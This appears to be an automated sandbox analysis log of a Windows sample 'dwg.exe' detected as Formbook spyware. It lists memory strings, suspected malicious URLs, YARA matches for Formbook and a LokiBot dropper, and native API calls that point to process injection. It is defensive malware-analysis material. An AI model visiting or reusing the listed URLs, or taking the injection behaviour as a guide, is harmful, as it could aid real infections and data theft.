      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
      Source: explorer.exe, 00000004.00000000.291566840.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
      Source: rundll32.exe, 0000000D.00000002.495403347.0000000004AA2000.00000004.00000001.sdmpString found in binary or memory: https://www.123-reg-new-domain.co.uk/iframe.html
      Source: rundll32.exe, 0000000D.00000002.495403347.0000000004AA2000.00000004.00000001.sdmpString found in binary or memory: https://www.apkiinsurance.com/gzjz/?iB=qjvGcpBS9gngfccxw5QFty

      E-Banking Fraud:

      barindex
      Yara detected FormBookShow sources
      Source: Yara matchFile source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORY

      System Summary:

      barindex
      Malicious sample detected (through community Yara rule)Show sources
      Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000002.489632071.0000000000684000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000002.495263682.0000000004927000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
      Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
      Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216329B NtSetInformationThread,NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216637E NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216180C NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216056A EnumWindows,NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02165DB1 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02160602 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02165E08 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02162626 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02162698 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216068A NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02165F0B NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216272A NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216279A NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02166384 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021663CA NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216640E NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02162831 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02165C3B NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216245B NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02166466 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02166487 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_0216288E NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021624AE NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021664C6 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021624F2 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02162916 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02166533 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02163522 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02162557 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02166558 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02160540 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02166596 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02162986 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021605B6 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_021625B2 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_02165DF8 NtResumeThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2896E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2897A0 NtUnmapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289540 NtReadFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2895D0 NtClose,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289A20 NtResumeThread,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289A00 NtProtectVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2898F0 NtReadVirtualMemory,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2899A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289610 NtEnumerateValueKey,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289670 NtQueryInformationProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289650 NtQueryValueKey,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2896D0 NtCreateKey,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289730 NtQueryVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E28A710 NtOpenProcessToken,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289760 NtOpenProcess,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E28A770 NtOpenThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289770 NtSetInformationFile,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289520 NtWaitForSingleObject,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E28AD30 NtSetContextThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289560 NtWriteFile,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2895F0 NtQueryInformationFile,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289A10 NtQuerySection,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289A80 NtOpenDirectoryObject,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289B00 NtSetValueKey,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E28A3B0 NtGetContextThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289820 NtEnumerateKey,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E28B040 NtSuspendThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2898A0 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E289950 NtQueueApcThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2899D0 NtCreateProcessEx,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565D76 NtProtectVirtualMemory,NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_0056637E NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566466 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_0056640E NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_005664C6 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566487 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566558 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566533 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565DCF NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565DE2 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566596 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565DB1 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565E08 NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_005666EB NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00565F0B NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_005663CA NtSetInformationThread,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_00566384 NtSetInformationThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459540 NtReadFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044595D0 NtClose,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459650 NtQueryValueKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459660 NtAllocateVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044596D0 NtCreateKey,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044596E0 NtFreeVirtualMemory,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459710 NtQueryInformationToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459FE0 NtCreateMutant,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459780 NtMapViewOfSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459840 NtDelayExecution,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459860 NtQuerySystemInformation,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459910 NtAdjustPrivilegesToken,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044599A0 NtCreateSection,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459A50 NtCreateFile,LdrInitializeThunk,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459560 NtWriteFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459520 NtWaitForSingleObject,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0445AD30 NtSetContextThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044595F0 NtQueryInformationFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459670 NtQueryInformationProcess,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459610 NtEnumerateValueKey,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459760 NtOpenProcess,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0445A770 NtOpenThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459770 NtSetInformationFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0445A710 NtOpenProcessToken,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459730 NtQueryVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044597A0 NtUnmapViewOfSection,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0445B040 NtSuspendThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459820 NtEnumerateKey,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044598F0 NtReadVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044598A0 NtWriteVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459950 NtQueueApcThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044599D0 NtCreateProcessEx,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459A00 NtProtectVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459A10 NtQuerySection,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459A20 NtResumeThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459A80 NtOpenDirectoryObject,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04459B00 NtSetValueKey,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0445A3B0 NtGetContextThread,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A81E0 NtCreateFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A8290 NtReadFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A8310 NtClose,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A83C0 NtAllocateVirtualMemory,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A819A NtCreateFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A81DC NtCreateFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A8235 NtCreateFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A828A NtReadFile,
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001A830B NtClose,
      Source: C:\Users\user\Desktop\dwg.exeCode function: 0_2_00401348
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E266E30
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30D616
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E312EF7
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E311FF1
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E31DFCE
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25841F
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30D466
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E240D20
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E312D07
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E311D55
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E272581
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25D5E0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3125DD
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3122AE
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E312B28
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E27EBB0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E30DBD2
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3003DA
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E31E824
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E301002
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E2720A0
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3120A8
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E25B090
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E3128EC
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E264120
      Source: C:\Users\user\Desktop\dwg.exeCode function: 1_2_1E24F900
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DD466
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442841F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E1D55
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E2D07
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04410D20
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E25DD
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442D5E0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04442581
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DD616
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04436E30
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E2EF7
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044EDFCE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E1FF1
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D1002
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044EE824
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443A830
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E28EC
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0442B090
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044420A0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E20A8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0441F900
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04434120
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044CFA2B
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E22AE
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0443AB40
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044E2B28
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044D03DA
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_044DDBD2
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_0444EBB0
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00198C70
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00198C6C
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00192D90
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00192D88
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AC73F
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_001AC7B8
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_00192FB0
      Source: C:\Users\user\Desktop\dwg.exeCode function: String function: 1E24B150 appears 45 times
      Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 0441B150 appears 54 times
      Source: dwg.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dwg.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: dwg.exe, 00000000.00000002.247277295.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameStoveddrif.exe vs dwg.exe
      Source: dwg.exe, 00000000.00000002.247561257.0000000002130000.00000002.00000001.sdmpBinary or memory string: OriginalFilenameuser32j% vs dwg.exe
      Source: dwg.exe, 00000000.00000002.248010737.0000000002960000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameStoveddrif.exeFE2XANTERIADGRIZZ vs dwg.exe
      Source: dwg.exe, 00000001.00000003.305857961.0000000000A40000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs dwg.exe
      Source: dwg.exe, 00000001.00000000.245755926.0000000000416000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameStoveddrif.exe vs dwg.exe
      Source: dwg.exe, 00000001.00000002.312855043.000000001E4CF000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs dwg.exe
      Source: dwg.exe, 00000001.00000002.312005314.000000001DD90000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs dwg.exe
      Source: dwg.exeBinary or memory string: OriginalFilenameStoveddrif.exe vs dwg.exe
      Source: dwg.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000002.489004546.00000000005D0000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.489632071.0000000000684000.00000004.00000020.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.306766910.0000000000080000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.495263682.0000000004927000.00000004.00000001.sdmp, type: MEMORYMatched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000002.488748194.00000000005A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000D.00000002.487250599.0000000000190000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000001.00000002.312051184.000000001DFF0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/0@13/8
      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6500:120:WilError_01
      Source: C:\Users\user\Desktop\dwg.exeFile created: C:\Users\user\AppData\Local\Temp\~DF888B9D52BBCA55F9.TMPJump to behavior
      Source: dwg.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\dwg.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
